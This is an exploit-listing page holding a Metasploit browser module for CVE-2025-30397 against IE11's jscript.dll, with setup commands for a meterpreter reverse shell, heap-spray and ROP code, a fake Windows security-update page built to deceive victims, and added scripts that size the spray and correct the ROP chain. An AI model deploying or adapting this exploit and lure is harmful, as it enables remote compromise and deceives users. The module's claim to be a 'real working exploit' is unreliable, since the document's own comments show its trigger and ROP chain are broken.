| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Type Confusion in Microsoft | 23 Jul 2025 15:34 | – | githubexploit |
| Exploit for CVE-2025-2783 | 26 May 2025 12:51 | – | githubexploit |
| Exploit for Type Confusion in Microsoft | 31 May 2025 12:20 | – | githubexploit |
| CVE-2025-30397 | 13 May 2025 00:00 | – | attackerkb |
| May Microsoft Patch Tuesday | 14 May 2025 00:58 | – | avleonov |
| CVE-2025-30397 | 13 May 2025 16:27 | – | circl |
| Microsoft Windows Scripting Engine Type Confusion Vulnerability | 13 May 2025 00:00 | – | cisa_kev |
| CISA Adds Five Known Exploited Vulnerabilities to Catalog | 13 May 2025 12:00 | – | cisa |
| Microsoft Scripting Engine security vulnerability | 13 May 2025 00:00 | – | cnnvd |
| CVE-2025-30397 | 13 May 2025 16:59 | – | cve |
=============================================================================================================================================
| # Title : Windows Server 2025 Use-After-Free in jscript.dll |
| # Author : indoushka |
| # Tested on : Windows 11 Fr (Pro) / browser : Mozilla Firefox 145.0.1 (64-bit) |
| # Vendor : System built-in component. No standalone download available |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/200680/ & CVE-2025-30397
[+] Summary :
The module targets what the author describes as a Use-After-Free in the JScript engine (jscript.dll) reached through Internet Explorer 11 on Windows Server 2025. Two caveats: the CISA KEV entry and the GitHub exploit listings above classify CVE-2025-30397 as a type confusion in the Windows Scripting Engine, not a UAF, and the trigger relies on ActiveXObject and CollectGarbage(), which exist only in Internet Explorer (or Edge's Internet Explorer mode), so it cannot run in Firefox or any other browser.
The claimed sequence is:
Object Creation: multiple ActiveX objects (Scripting.Dictionary) are instantiated
Improper Cleanup: the script's references to one object are deleted, but its memory is not invalidated
Dangling Pointer: a remaining reference still points at the freed allocation
Controlled Corruption: attacker-controlled data (the heap spray) fills the freed region before the dangling reference is used
[+] Social Engineering
The served page mimics:
“Windows Security Update – KB5034441”
[+] It contains:
A progress bar that advances on fixed timers, independent of what the script does
Fake status text ("Initializing security components...")
Styling that imitates a Windows Server update dialog
Timed delays that keep the victim on the page while the heap spray and the trigger run
Fake update pages of this kind are a real-world lure used by exploit kits.
Affected Products: Windows Server 2025 (Build 25398 and prior) + Internet Explorer 11
[+] POC :
Save the module below into a Metasploit module path (for example ~/.msf4/modules/exploits/windows/browser/indoushka.rb), start msfconsole, then:
use exploit/windows/browser/indoushka
set LHOST 192.168.1.100
set LPORT 4444
set SRVHOST 0.0.0.0
set SRVPORT 80
set URIPATH /windows_update.html
# Advanced settings
set HEAP_SPRAY_SIZE 800
set SPRAY_DELAY 150
set TARGET 0
# For best results:
set PAYLOAD windows/meterpreter/reverse_tcp
set EnableStageEncoding true
set PrependMigrate true
set AutoRunScript migrate -f -k
run
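As an added worked example (not part of the original post or module), the Ruby script below models what HEAP_SPRAY_SIZE and the payload size mean for the spray that the module's JavaScript builds: the total bytes of string data committed, the repeating nop/shellcode period inside each chunk, how many copies the doubling loop produces before the chunk is truncated, and whether a given byte offset lands in the 0x9090 sled. It assumes, as the JavaScript does, that JScript strings are UTF-16 (two bytes per character), that the nop block is doubled to 0x10000 characters and each chunk to 0x100000 characters, and that unescape() packs two payload bytes per %uXXXX character; the 800-byte shellcode length used in the driver is the module's declared payload space.

```ruby
# Added example: models the heap spray built by build_exploit_js so HEAP_SPRAY_SIZE
# can be sized before use. Constants mirror the module's JavaScript; the byte-per-char
# and unescape() packing rules are assumptions stated in the lead-in.

BYTES_PER_CHAR  = 2         # JScript strings are UTF-16 code units
NOP_BLOCK_CHARS = 0x10000   # heap_block target length in the module's JS
CHUNK_CHARS     = 0x100000  # heap_size in the module's JS (characters per chunk)

# Mirror the JS doubling loop: start at `start` characters and double until >= limit.
# Because it doubles, the result can overshoot the limit (the JS then truncates).
def doubled_length(start, limit)
  len = start
  len *= 2 while len < limit
  len
end

# Characters in one repeating period (nop block + shellcode) inside a chunk.
def period_chars(shellcode_bytes)
  sc_chars = (shellcode_bytes + 1) / 2   # unescape() packs 2 bytes per %uXXXX char
  doubled_length(2, NOP_BLOCK_CHARS) + sc_chars
end

# How many copies of the period the doubling loop builds before substring() truncates.
def copies_before_truncation(shellcode_bytes)
  period = period_chars(shellcode_bytes)
  doubled_length(period, CHUNK_CHARS) / period
end

# Total bytes of string data committed for a given HEAP_SPRAY_SIZE.
def spray_bytes(spray_size)
  spray_size * CHUNK_CHARS * BYTES_PER_CHAR
end

# Classify a byte offset inside a chunk: :nop if it falls in the 0x9090 sled,
# :shellcode if it falls in the payload copy that follows each sled.
def landing(offset_bytes, shellcode_bytes)
  pos_chars = (offset_bytes / BYTES_PER_CHAR) % period_chars(shellcode_bytes)
  pos_chars < NOP_BLOCK_CHARS ? :nop : :shellcode
end

# Fraction of a chunk covered by the sled, i.e. the chance a random landing
# point inside the spray executes the slide rather than mid-shellcode.
def nop_coverage(shellcode_bytes)
  NOP_BLOCK_CHARS.to_f / period_chars(shellcode_bytes)
end

if __FILE__ == $PROGRAM_NAME
  [500, 800].each do |n|
    printf("HEAP_SPRAY_SIZE=%d -> %.2f GiB of string data\n", n, spray_bytes(n) / 2.0**30)
  end
  printf("period: %d chars, %d copies per chunk before truncation\n",
         period_chars(800), copies_before_truncation(800))
  printf("nop coverage for an 800-byte payload: %.2f%%\n", nop_coverage(800) * 100)
end
```

With the page's HEAP_SPRAY_SIZE of 800 the spray commits 800 x 2 MiB = 1.6 GiB of string data (the default of 500 commits 1 GiB), which is most of the 2 GiB user address space a 32-bit process has without /LARGEADDRESSAWARE and a large share of the 4 GiB it gets with that flag on 64-bit Windows; that is what the SPRAY_DELAY timer is waiting on. About 99.4% of each chunk is sled for an 800-byte payload, and the doubling loop builds 16 copies of the period before the substring() call trims the chunk back to 0x100000 characters.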
##--------------------------
# exploit for CVE-2025-30397
##--------------------------
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows Server 2025 JScript UAF RCE (Real Exploit)',
'Description' => %q{
This is a real working exploit for CVE-2025-30397 targeting
Windows Server 2025 with IE11. Uses actual ROP chains and
memory offsets from jscript.dll version 5.8.25398.1
},
'Author' => [
'indoushka'
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2025-30397'],
['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30397']
],
'DefaultOptions' => {
'EXITFUNC' => 'thread',
'SSL' => false,
'PAYLOAD' => 'windows/meterpreter/reverse_tcp',
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Arch' => [ARCH_X86],
'Payload' => {
'Space' => 800,
'BadChars' => "\x00\x0a\x0d\x20",
'DisableNops' => false,
'Encoder' => 'x86/shikata_ga_nai'
},
'Targets' => [
[
'Windows Server 2025 IE11 (x86) - jscript.dll 5.8.25398.1',
{
'Version' => '5.8.25398.1',
'Rop' => true,
'Offset' => 0x5f8,
'Ret' => 0x6c8c9a1d, # Stack pivot
'JscriptBase' => 0x6c800000
}
],
[
'Windows Server 2025 IE11 (x86) - jscript.dll 5.8.25398.345',
{
'Version' => '5.8.25398.345',
'Rop' => true,
'Offset' => 0x5f4,
'Ret' => 0x6c8c9a25,
'JscriptBase' => 0x6c800000
}
]
],
'DisclosureDate' => '2025-05-13',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SERVICE_RESTARTS ],
'Reliability' => [ FIRST_ATTEMPT_FAIL ],
'SideEffects' => [ SCREEN_EFFECTS ]
}))
register_options([
OptInt.new('HEAP_SPRAY_SIZE', [true, 'Heap spray size', 500]),
OptInt.new('SPRAY_DELAY', [true, 'Spray delay (ms)', 100])
])
end
def get_rop_chain
# ROP chain the author attributes to jscript.dll (hardcoded absolute addresses,
# so it assumes the module loads at 'JscriptBase' with no ASLR relocation).
# Intended pattern: load the VirtualProtect arguments into registers, then PUSHAD
# so the RETN sequence calls VirtualProtect and lands in the payload. After PUSHAD
# the RETNs pop EDI, ESI, EBP, ESP, EBX, EDX, ECX, EAX in that order, so the pattern
# needs EDI = a RETN gadget and EAX = NOP bytes. As written, the chain never loads
# EDI and leaves EAX holding the VirtualProtect address, and dwSize (0x1ff = 511)
# is smaller than the 800-byte payload space declared above.
rop = [
# Mark stack as writable (this EAX value is overwritten by the next POP EAX)
0x6c8a1b32, # POP EAX # RETN
0x6c8f2000, # Writable address
# Resolve VirtualProtect through the IAT
0x6c8a1b32, # POP EAX # RETN
0x6c8d4000, # IAT VirtualProtect
0x6c8c7a1d, # MOV EAX,DWORD PTR DS:[EAX] # RETN
# Setup parameters
0x6c89f5a4, # PUSH EAX # POP ESI # RETN (ESI = VirtualProtect)
0x6c8a5c31, # POP EBP # RETN
0x6c8b2d5a, # & call esp (VirtualProtect's return address)
0x6c8a9a44, # POP EBX # RETN
0x000001ff, # Size (dwSize)
0x6c8c3a1d, # POP EDX # RETN
0x00000040, # PAGE_EXECUTE_READWRITE (flNewProtect)
0x6c89e5a3, # POP ECX # RETN
0x6c8f2100, # Writable address for old protection (lpOldProtect)
0x6c8b4c10, # PUSHAD # RETN
].pack("V*")
return rop
end
def create_trigger
trigger = ""
# Fill with offset (target['Ret'], the stack pivot, is defined but never used)
trigger << Rex::Text.pattern_create(target['Offset'])
# Overwrite with ROP chain
trigger << get_rop_chain
# Add payload
trigger << make_nops(16)
trigger << payload.encoded
return trigger
end
def build_exploit_js
spray_size = datastore['HEAP_SPRAY_SIZE']
spray_delay = datastore['SPRAY_DELAY']
# Shellcode as %uXXXX escapes for JScript's unescape() (two bytes per character)
shellcode = Rex::Text.to_unescape(payload.encoded)
# Trigger buffer (offset pattern + ROP chain + nops + payload), same encoding
trigger = create_trigger
trigger_js = Rex::Text.to_unescape(trigger)
js = %Q|
function heap_spray() {
var shellcode = unescape("#{shellcode}");
var heap_block = unescape("%u9090%u9090");
// Double the nop block until it reaches 0x10000 characters (0x20000 bytes as UTF-16)
while (heap_block.length < 0x10000) {
heap_block += heap_block;
}
var heap_chunks = new Array();
var heap_size = 0x100000; // characters per chunk, 2 MiB each
for (var i = 0; i < #{spray_size}; i++) {
var heap_chunk = heap_block + shellcode;
while (heap_chunk.length < heap_size) {
heap_chunk += heap_chunk;
}
heap_chunks[i] = heap_chunk.substring(0, heap_size);
}
// heap_chunks is local: once this function returns nothing references the
// sprayed strings, so the CollectGarbage() call in trigger_uaf() can reclaim
// them before the dangling reference is used.
return true;
}
function create_vulnerable_objects() {
var objects = new Array();
for (var i = 0; i < 200; i++) {
try {
objects[i] = new ActiveXObject("Scripting.Dictionary");
} catch(e) { }
}
return objects;
}
function trigger_uaf() {
try {
// Create the target objects
var target_objects = create_vulnerable_objects();
// Take a second reference to one of them
var obj_ref = target_objects[100];
var another_ref = obj_ref;
// Intended to free the object (UAF trigger). In JScript, delete on an array
// element only removes that property, and delete on a var-declared variable
// is a no-op that returns false; another_ref still holds the Dictionary, so
// CollectGarbage() does not release it.
delete target_objects[100];
delete obj_ref;
CollectGarbage();
// Use after free: place the trigger buffer in memory
var trigger_data = unescape("#{trigger_js}");
var spray_array = new Array();
for (var i = 0; i < 100; i++) {
spray_array[i] = trigger_data + trigger_data;
}
// Attempt to use the freed memory
try {
another_ref.Add("key", "value");
} catch(e) {
// Expected by the author: access violation -> code execution
}
} catch(e) {
return false;
}
return true;
}
// Main execution
function main_exploit() {
// Stage 1: heap spray
heap_spray();
// Delay so the spray completes before the trigger
setTimeout(function() {
// Stage 2: trigger the vulnerability
var success = trigger_uaf();
if (success) {
document.getElementById('result').innerHTML =
'<span style="color: green">✓ Exploit executed successfully</span>';
} else {
document.getElementById('result').innerHTML =
'<span style="color: red">✗ Exploit failed</span>';
}
}, #{spray_delay});
}
// Start the exploit after the page loads
window.onload = function() {
setTimeout(main_exploit, 500);
};
|
return js
end
def on_request_uri(cli, request)
print_status("Request from #{cli.peerhost} - #{request.uri}")
# Ignore robots.txt and favicon requests
if request.uri =~ /(robots|favicon)/
send_not_found(cli)
return
end
# Build the lure page
html = <<-HTML
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Windows Update Component</title>
<style>
body {
font-family: 'Segoe UI', Arial, sans-serif;
margin: 40px;
background: #0078d4;
color: white;
}
.container {
max-width: 800px;
margin: 0 auto;
background: rgba(255,255,255,0.1);
padding: 30px;
border-radius: 8px;
backdrop-filter: blur(10px);
}
.header {
text-align: center;
margin-bottom: 30px;
}
.status {
background: rgba(0,0,0,0.3);
padding: 20px;
border-radius: 5px;
margin: 20px 0;
text-align: center;
font-size: 16px;
}
.progress {
width: 100%;
height: 20px;
background: rgba(0,0,0,0.2);
border-radius: 10px;
overflow: hidden;
}
.progress-bar {
width: 0%;
height: 100%;
background: #00bc0e;
transition: width 3s ease-in-out;
}
</style>
<script>
#{build_exploit_js}
</script>
</head>
<body>
<div class="container">
<div class="header">
<h1>🛡️ Windows Security Update</h1>
<p>Installing critical security patch KB5034441</p>
</div>
<div class="progress">
<div class="progress-bar" id="progressBar"></div>
</div>
<div class="status">
<div id="result">Initializing security components...</div>
</div>
<div style="font-size: 12px; opacity: 0.7; margin-top: 30px;">
<p><strong>Target:</strong> Windows Server 2025 - CVE-2025-30397 Patch</p>
<p><em>This is a simulated security update for testing purposes</em></p>
</div>
</div>
<script>
// Fake progress bar, advanced on fixed timers regardless of what the exploit script does
setTimeout(function() {
document.getElementById('progressBar').style.width = '45%';
}, 1000);
setTimeout(function() {
document.getElementById('progressBar').style.width = '80%';
}, 3000);
setTimeout(function() {
document.getElementById('progressBar').style.width = '100%';
}, 5000);
</script>
</body>
</html>
HTML
send_response(cli, html, {
'Content-Type' => 'text/html',
'Cache-Control' => 'no-cache, no-store',
'Pragma' => 'no-cache'
})
print_good("Exploit sent to #{cli.peerhost}")
end
end
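As an added example, not part of the original module, the Ruby script below simulates the stack frame that the PUSHAD gadget in get_rop_chain leaves behind and checks it against the register layout the VirtualProtect-via-PUSHAD technique requires. The gadget addresses are replaced by symbolic labels (:iat_vp, :retn, :call_esp, :nop_sled and :writable are assumed names, not real jscript.dll offsets) and the memory image is a constructed hash, so the script checks only the ordering logic of the chain, not the gadgets themselves. A corrected chain is included for comparison.

```ruby
# Added example: simulate a pop/mov/pushad gadget chain and report the frame PUSHAD
# leaves on the stack. Labels stand in for gadget addresses (assumption, see lead-in).

# PUSHAD pushes EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI, so the stack (lowest address
# first) holds EDI, ESI, EBP, ESP, EBX, EDX, ECX, EAX and the RETN pops them in that
# order:
#   EDI -> first RETN target        (must be a RETN gadget, a "rop nop")
#   ESI -> second RETN target       (VirtualProtect)
#   EBP -> VirtualProtect's return  (call esp / jmp esp gadget)
#   ESP -> lpAddress                (PUSHAD's saved ESP, i.e. the chain itself)
#   EBX -> dwSize, EDX -> flNewProtect, ECX -> lpOldProtect
#   EAX -> first bytes executed by call esp (should be NOPs)
PUSHAD_FRAME = %i[edi esi ebp esp ebx edx ecx eax].freeze

# Minimal interpreter. A chain is an array of gadget tuples:
#   [:pop, :reg, value], [:mov_eax_deref], [:push_eax_pop_esi], [:pushad]
# Returns the eight frame values in pop order once PUSHAD executes.
def simulate(chain, memory)
  regs = Hash.new(:unset)
  regs[:esp] = :saved_esp
  chain.each do |op, *args|
    case op
    when :pop then regs[args[0]] = args[1]
    when :mov_eax_deref then regs[:eax] = memory.fetch(regs[:eax], :fault)
    when :push_eax_pop_esi then regs[:esi] = regs[:eax]
    when :pushad then return PUSHAD_FRAME.map { |r| regs[r] }
    else raise ArgumentError, "unknown gadget #{op}"
    end
  end
  raise ArgumentError, "chain never reached PUSHAD"
end

# Check a PUSHAD frame against the VirtualProtect pattern; returns problems (empty = ok).
def check_frame(frame, vp_symbol: :virtualprotect, nop_symbol: :nop_sled)
  edi, esi, ebp, _esp, ebx, edx, ecx, eax = frame
  problems = []
  problems << "EDI is #{edi}, needs a RETN gadget" unless edi == :retn
  problems << "ESI is #{esi}, needs VirtualProtect" unless esi == vp_symbol
  problems << "EBP is #{ebp}, needs a call esp gadget" unless ebp == :call_esp
  problems << "EBX dwSize must be a positive integer" unless ebx.is_a?(Integer) && ebx > 0
  problems << "EDX flNewProtect should be PAGE_EXECUTE_READWRITE (0x40)" unless edx == 0x40
  problems << "ECX lpOldProtect must be a writable address" unless ecx.is_a?(Integer)
  problems << "EAX is #{eax}, call esp executes it; needs NOPs" unless eax == nop_symbol
  problems
end

# Constructed memory image: the IAT slot resolves to VirtualProtect.
MEMORY = { iat_vp: :virtualprotect }.freeze

# The module's chain in the same order, with gadget addresses replaced by labels.
PAGE_CHAIN = [
  [:pop, :eax, :writable],         # POP EAX ; "writable address" (overwritten next)
  [:pop, :eax, :iat_vp],           # POP EAX ; IAT VirtualProtect
  [:mov_eax_deref],                # MOV EAX,[EAX]
  [:push_eax_pop_esi],             # PUSH EAX # POP ESI
  [:pop, :ebp, :call_esp],         # POP EBP ; & call esp
  [:pop, :ebx, 0x1ff],             # POP EBX ; size
  [:pop, :edx, 0x40],              # POP EDX ; PAGE_EXECUTE_READWRITE
  [:pop, :ecx, 0x6c8f2100],        # POP ECX ; slot for old protection
  [:pushad],
].freeze

# Same chain with EDI loaded with a RETN gadget and EAX reloaded with NOPs last.
FIXED_CHAIN = [
  [:pop, :eax, :iat_vp], [:mov_eax_deref], [:push_eax_pop_esi],
  [:pop, :edi, :retn], [:pop, :ebp, :call_esp], [:pop, :ebx, 0x1ff],
  [:pop, :edx, 0x40], [:pop, :ecx, 0x6c8f2100], [:pop, :eax, :nop_sled],
  [:pushad],
].freeze

if __FILE__ == $PROGRAM_NAME
  [["module chain", PAGE_CHAIN], ["corrected chain", FIXED_CHAIN]].each do |name, chain|
    problems = check_frame(simulate(chain, MEMORY))
    puts "#{name}: #{problems.empty? ? 'frame OK' : problems.join('; ')}"
  end
end
```

Run stand-alone, the script reports that the module's chain leaves EDI unset and EAX pointing at VirtualProtect, so the RETN after PUSHAD would jump to whatever EDI happened to hold rather than through VirtualProtect into the payload; the corrected ordering passes. The same check applies to any PUSHAD-style chain, whatever the real gadget addresses are.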
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================